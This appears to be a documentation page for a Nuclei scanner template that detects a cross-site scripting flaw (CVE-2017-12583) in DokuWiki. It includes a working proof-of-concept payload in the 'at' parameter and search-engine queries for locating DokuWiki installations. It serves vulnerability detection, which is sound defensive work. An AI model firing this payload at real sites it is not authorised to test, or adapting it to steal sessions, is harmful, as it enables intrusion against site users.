DokuWiki - Cross-Site Scripting
ID: CVE-2017-12583
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2017,xss,dokuwiki
Description
Section titled “Description”DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2017-12583
info: name: DokuWiki - Cross-Site Scripting author: DhiyaneshDK severity: medium description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/splitbrain/dokuwiki/issues/2061 - https://nvd.nist.gov/vuln/detail/CVE-2017-12583 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-12583 cwe-id: CWE-79 epss-score: 0.00088 epss-percentile: 0.37623 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dokuwiki product: dokuwiki shodan-query: - http.title:"DokuWiki" - http.title:"dokuwiki" - cpe:"cpe:2.3:a:dokuwiki:dokuwiki" fofa-query: title="dokuwiki" google-query: intitle:"dokuwiki" tags: cve,cve2017,xss,dokuwiki
http: - method: GET path: - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'
matchers-condition: and matchers: - type: word part: body words: - 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'
- type: word part: header words: - 'text/html'
- type: status status: - 200# digest: 4b0a004830460221008b62d8b0c05d54b7a6ed67c9eea307bf796e2d52386b1c2ac17548ef9f6f626002210095c4ad46215f23f7db4d7a26d323b353bea9c59d366c04299e59179f33dc3761:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-12583.yaml"